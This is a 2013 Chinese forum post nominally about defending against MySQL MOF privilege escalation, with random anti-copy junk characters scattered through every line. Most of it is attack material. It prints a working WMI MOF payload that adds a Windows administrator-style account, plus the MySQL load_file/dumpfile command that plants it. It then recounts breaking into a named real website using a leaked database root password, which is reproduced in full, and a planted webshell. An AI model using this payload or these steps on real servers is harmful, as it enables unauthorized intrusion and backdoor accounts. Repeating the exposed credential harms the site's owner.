Mysql mof扩展漏洞防范方法
: {% S9 r' [1 x0 W; I/ @6 A2 h2 J( `' I" d) D
网上公开的一些利用代码:
- R. X5 K& ?* m) G6 l' Z3 L+ J
2 {" Y# H# X4 X6 Q7 J#pragma namespace(“\\\\.\\root\\subscription”)/ |( V. M( M) g' `
( m K, G8 W. V5 I2 w: z0 A0 m
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };7 j) W% J5 V7 l& q0 e7 N
M. s8 b5 ]" y3 j" G 2 G& y# \2 {2 h7 p# S8 ~6 W
) ~) B* o+ ?6 Z0 }6 ~1 ^
' [& n; c* Q& w2 E) h! ?, |, P& ~* [/ ?% M8 @0 D: u O
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;- F( A! i* L I0 t8 J
从上面代码来看得出解决办法:
6 h* r- B8 U% ~. n' v1 r/ S; I5 U/ R: P0 a" U! y
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数1 k$ o3 y* H3 }0 ~. g
! g# I7 x: u# d- O n! V9 s2、禁止使用”WScript.Shel”组件
/ w! _# _+ [0 N7 Q" L! Q0 k, ^1 l9 A( k" C3 ^
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
8 S/ G: K* o, p7 [0 K5 z: B2 E7 R( I$ Y( p4 c/ _
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
, d' o, a0 B/ t$ C' p9 O
4 j4 l% z, d d& Y7 Z1 N6 O" Q事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权- H3 s# \- D9 `9 M+ m& k, K
/ l. t5 N1 @0 |8 U" l' P6 J/ l3 p
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
! r8 E% g7 k! o; Y6 ^& d
! Q( |2 _: h5 z看懂了后就开始练手吧* C' e( w2 Z& ?7 m9 Z; H6 c
2 }% v; y& q; _ y
http://www.webbmw.com/config/config_ucenter.php 一句话 a
% x, `' z1 L1 u
( a3 l* D. f0 V- m$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
9 h; G3 D) a. e1 a) ]
7 p; S2 w; B7 K. S8 L3 T; z于是直接用菜刀开搞: c" A1 c! n- Y3 Q$ t
! k# u1 ^' |; G' O- ]+ M" l上马先
0 B+ F" M% D* l( @/ s$ f
: o7 f1 z; s w$ h既然有了那些账号 之类的 于是我们就执行吧…….
# A2 l- Z6 s, r1 a
( U! |3 G6 w* l. [) L; i小小的说下- y; v7 i; e! b. p6 L+ i3 o L" z
% y% k" ^3 @+ `* {0 A* A) n0 u. W+ B
在这里第1次执行未成功 原因未知2 c6 g# c- g$ O* p# a
7 A+ I& G; b2 { h
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。, `( U; x! Y+ R
+ F i6 r9 f9 L
#pragma namespace(“\\\\.\\root\\subscription”)
/ `( R# M5 F( L9 w
5 a' l7 j/ T$ S7 {, p- Uinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };) U) n9 P+ J; Y% T2 U9 }% q; }7 Q
) o- f% k2 u, k" R6 H我是将文件放到C:\WINDOWS\temp\1.mof" x, J3 T! W' C" L
2 x6 x# E, ^* H$ ]$ ?# N( z所以我们就改下执行的代码9 B: q: P/ Y j, G
9 D6 }! X% p6 d& a* D; M7 n: ^
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;- m0 a/ L! u$ g; g# {
4 O3 W0 [ j) Y
5 C" B3 W4 w* T7 V- u Y7 H6 [
# b/ u2 T5 I& U8 `( v但是 你会发现账号还是没有躺在那里。。
9 t- B& X0 I3 |; W( X, V9 F) |/ _: q/ z
于是我就感觉蛋疼
% Q$ w7 n8 E% p& j3 t
3 H! G3 b% v8 D- V( ^6 m就去一个一个去执行 但是执行到第2个 mysql时就成功了………: f& u; J" |! j" j5 T0 E( T- w
# u2 y! Q' k, t7 x' I: ~0 j
1 X+ ^, Q7 M m, }. w) X1 S! \2 v( W2 l8 ^/ A. d. A
但是其他库均不成功…0 R( R4 l7 R: _! v
% u; z' Z# s" }: I) g+ ~; v我就很费解呀 到底为什么不成功求大牛解答…
0 g) o" g9 @7 l. T3 z3 C9 r: v% J; @8 M4 [2 ]( D& D
' T# P5 e. s& o& f
* @5 \/ ~0 Q. d% y& C7 s3 F |
发表于 2013-1-4 19:49:49
收藏
支持
反对